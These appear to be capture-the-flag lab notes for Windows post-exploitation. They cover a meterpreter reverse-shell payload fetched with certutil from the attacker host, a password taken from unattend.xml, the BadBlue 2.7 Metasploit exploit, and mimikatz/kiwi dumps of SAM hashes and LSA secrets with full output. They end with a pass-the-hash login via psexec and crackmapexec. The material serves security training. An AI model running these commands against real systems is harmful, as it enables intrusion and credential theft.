- Target IP:
10.4.19.9- Searching for password in Windows Configuration files
- Both Kali Machine and Attacker/Victim Windows machine are provided
- On the Attacker machine check the current user
- From the Kali machine, generate a
meterpreterx64 payload
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.10.4.2 LPORT=1234 -f exe > payload.exe- Set up a web server to host the payload
python -m SimpleHTTPServer 80- Download the payload file on the target system using the
certutiltool incmd
cd Desktop
certutil -urlcache -f http://10.10.4.2/payload.exe payload.exe- Stop the http server and start
msfconsoleon the Kali machine
msfconsole -quse multi/handler
set payload windows/x64/meterpreter/reverse_tcp
set LPORT 1234
set LHOST 10.10.4.2
run- Execute the
payload.exeon the Win target system and check the reverse shell on Kali
- Manually search for the
unattend.xmlfile, it should be insideC:\\Windows\\Panther
cd C:\\Windows\\Panther
dir
download unattend.xml
- In a new terminal tab
cat unattend.xml
administratoruser configured base64 password isQWRtaW5AMTIz- Save it to a new file
- Decode it using the
base64tool
nano password.txt
# paste the password, save and exit the file
base64 -d password.txt
Admin@123root
- Test the
administrator:Admin@123rootcredentials with thepsexectool
psexec.py administrator@10.4.19.9
cd C:\Users\Administrator\Desktop
type flag.txtReveal Flag: 🚩
097ab83639dce0ab3429cb0349493f60
🔬 Windows: Meterpreter: Kiwi Extension
- Target IP:
10.2.29.32- Dumping passwords hashes with mimikatz
- Both Kali Machine and Attacker/Victim Windows machine are provided
nmap 10.2.29.3280/tcp open http
135/tcp open msrpc
139/tcp open netbios-ssn
445/tcp open microsoft-ds
3389/tcp open ms-wbt-servernmap -sV -p 80 10.2.29.3280/tcp open http BadBlue httpd 2.7
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows- 📌 Exploit BadBlue 2.7 with
metasploit
msfconsole -qsearch badblue
use exploit/windows/http/badblue_passthru
set RHOSTS 10.2.29.32
runsysinfo
getuid
pgrep lsass
migrate 768
- In the
meterpretersession load Kiwi
load kiwi
help
- Retrieve all credentials
creds_allmsv credentials
===============
Username Domain NTLM SHA1
-------- ------ ---- ----
Administrator ATTACKDEFENSE e3c61a68f1b89ee6c8ba9507378dc88d fa62275e30d286c09d30d8fece82664eb34323ef
wdigest credentials
===================
Username Domain Password
-------- ------ --------
(null) (null) (null)
ATTACKDEFENSE$ WORKGROUP (null)
Administrator ATTACKDEFENSE (null)
# clear-text passwords are not stored on Win2016
kerberos credentials
====================
Username Domain Password
-------- ------ --------
(null) (null) (null)
Administrator ATTACKDEFENSE (null)
attackdefense$ WORKGROUP (null)- Dump LSA SAM (NTLM hashes for all users)
lsa_dump_sam[+] Running as SYSTEM
[*] Dumping SAM
Domain : ATTACKDEFENSE
SysKey : 377af0de68bdc918d22c57a263d38326
Local SID : S-1-5-21-3688751335-3073641799-161370460
SAMKey : 858f5bda5c99e45094a6a1387241a33d
RID : 000001f4 (500)
User : Administrator
Hash NTLM: e3c61a68f1b89ee6c8ba9507378dc88d
RID : 000001f5 (501)
User : Guest
RID : 000001f7 (503)
User : DefaultAccount
RID : 000001f8 (504)
User : WDAGUtilityAccount
Hash NTLM: 58f8e0214224aebc2c5f82fb7cb47ca1
RID : 000003f0 (1008)
User : student
Hash NTLM: bd4ca1fbe028f3c5066467a7f6a73b0b
- Dump LSA secrets. This could provide with clear-text passwords
lsa_dump_secrets
[+] Running as SYSTEM
[*] Dumping LSA secrets
Domain : ATTACKDEFENSE
SysKey : 377af0de68bdc918d22c57a263d38326
Local name : ATTACKDEFENSE ( S-1-5-21-3688751335-3073641799-161370460 )
Domain name : WORKGROUP
Policy subsystem is : 1.18
LSA Key(s) : 1, default {47980b9c-8bd1-89c9-bfb5-0c4fca25e625}
[00] {47980b9c-8bd1-89c9-bfb5-0c4fca25e625} 247e7be223db5e50291fc0fcec276ff8236c32a8a6183c5a0d0b6b044590ce06
Secret : DPAPI_SYSTEM
cur/hex : 01 00 00 00 34 5e 65 80 f9 04 a4 8c a5 0e 6c 74 6c d2 c3 b8 8e 7a ca c3 a3 3b 0e 6e 0a 64 f3 12 fc c7 92 67 a3 2f d5 d1 e4 41 33 ac
full: 345e6580f904a48ca50e6c746cd2c3b88e7acac3a33b0e6e0a64f312fcc79267a32fd5d1e44133ac
m/u : 345e6580f904a48ca50e6c746cd2c3b88e7acac3 / a33b0e6e0a64f312fcc79267a32fd5d1e44133ac
old/hex : 01 00 00 00 c1 3a 28 e3 94 7b 64 5d 94 29 b4 c9 1c 9b 0c b1 b6 5a aa 2c 34 4d ee ed 86 74 0f 12 25 37 8c 38 69 b3 b4 53 b6 37 86 44
full: c13a28e3947b645d9429b4c91c9b0cb1b65aaa2c344deeed86740f1225378c3869b3b453b6378644
m/u : c13a28e3947b645d9429b4c91c9b0cb1b65aaa2c / 344deeed86740f1225378c3869b3b453b6378644
Secret : NL$KM
cur/hex : 8d d2 8e 67 54 58 89 b1 c9 53 b9 5b 46 a2 b3 66 d4 3b 95 80 92 7d 67 78 b7 1d f9 2d a5 55 b7 a3 61 aa 4d 86 95 85 43 86 e3 12 9e c4 91 cf 9a 5b d8 bb 0d ae fa d3 41 e0 d8 66 3d 19 75 a2 d1 b2
old/hex : 8d d2 8e 67 54 58 89 b1 c9 53 b9 5b 46 a2 b3 66 d4 3b 95 80 92 7d 67 78 b7 1d f9 2d a5 55 b7 a3 61 aa 4d 86 95 85 43 86 e3 12 9e c4 91 cf 9a 5b d8 bb 0d ae fa d3 41 e0 d8 66 3d 19 75 a2 d1 b2cd C:\\
mkdir Temp
cd Temp
meterpreter > upload /usr/share/windows-resources/mimikatz/x64/mimikatz.exe
shell- Run
mimikatz.exe
mimikatz.exe
privilege::debug
Privilege '20' OK
# I have the required privileges for hash extraction from memory- Dump the cache of the
lsassprocess
lsadump::sam
lsadump::secrets
- Display logon passwords, when stored in clear-text
- in this case clear-text password are disabled -
(null)
- in this case clear-text password are disabled -
sekurlsa::logonPasswords
Reveal Flag - Administrator NTLM Hash is: 🚩
e3c61a68f1b89ee6c8ba9507378dc88d
Reveal Flag - Student NTLM Hash is: 🚩
bd4ca1fbe028f3c5066467a7f6a73b0b
Reveal Flag - SysKey is: 🚩
377af0de68bdc918d22c57a263d38326
🔬 Windows: Meterpreter: Kiwi Extension - same lab as Lab 2
- Target IP changed:
10.2.29.32- Use Pass-the-hash attack
- Both Kali Machine and Attacker/Victim Windows machine are provided
nmap 10.2.23.20280/tcp open http
135/tcp open msrpc
139/tcp open netbios-ssn
445/tcp open microsoft-ds
3389/tcp open ms-wbt-server
5357/tcp open wsdapinmap -sV -p 80 10.2.23.20280/tcp open http BadBlue httpd 2.7
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows- 📌 Exploit BadBlue 2.7 with
metasploit
msfconsole -qsearch badblue
use exploit/windows/http/badblue_passthru
set RHOSTS 10.2.23.202
runpgrep lsass
migrate 772
getuid
Server username: NT AUTHORITY\SYSTEMload kiwilsa_dump_sam[+] Running as SYSTEM
[*] Dumping SAM
Domain : ATTACKDEFENSE
SysKey : 377af0de68bdc918d22c57a263d38326
Local SID : S-1-5-21-3688751335-3073641799-161370460
SAMKey : 858f5bda5c99e45094a6a1387241a33d
RID : 000001f4 (500)
User : Administrator
Hash NTLM: e3c61a68f1b89ee6c8ba9507378dc88d
RID : 000001f5 (501)
User : Guest
RID : 000001f7 (503)
User : DefaultAccount
RID : 000001f8 (504)
User : WDAGUtilityAccount
Hash NTLM: 58f8e0214224aebc2c5f82fb7cb47ca1
RID : 000003f0 (1008)
User : student
Hash NTLM: bd4ca1fbe028f3c5066467a7f6a73b0b📌 Save users NTLM hashes in a text file for future use
Administrator: e3c61a68f1b89ee6c8ba9507378dc88d
student: bd4ca1fbe028f3c5066467a7f6a73b0b
hashdumpAdministrator:500:aad3b435b51404eeaad3b435b51404ee:e3c61a68f1b89ee6c8ba9507378dc88d:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
student:1008:aad3b435b51404eeaad3b435b51404ee:bd4ca1fbe028f3c5066467a7f6a73b0b:::
WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:58f8e0214224aebc2c5f82fb7cb47ca1:::- LM+NTLM hash is necessary, so copy the string:
aad3b435b51404eeaad3b435b51404ee:e3c61a68f1b89ee6c8ba9507378dc88d
- Use PSExec to login with
Administratoruser and its password hashes
background
search psexec
use exploit/windows/smb/psexec
options
sessions
# change Payload options
set LPORT 4422
set RHOSTS 10.2.23.202
set SMBUser Administrator
set SMBPass aad3b435b51404eeaad3b435b51404ee:e3c61a68f1b89ee6c8ba9507378dc88d
# set target Native\ upload
exploitgetuid
sysinfo
crackmapexec smb 10.2.23.202 -u Administrator -H "e3c61a68f1b89ee6c8ba9507378dc88d" -x "whoami"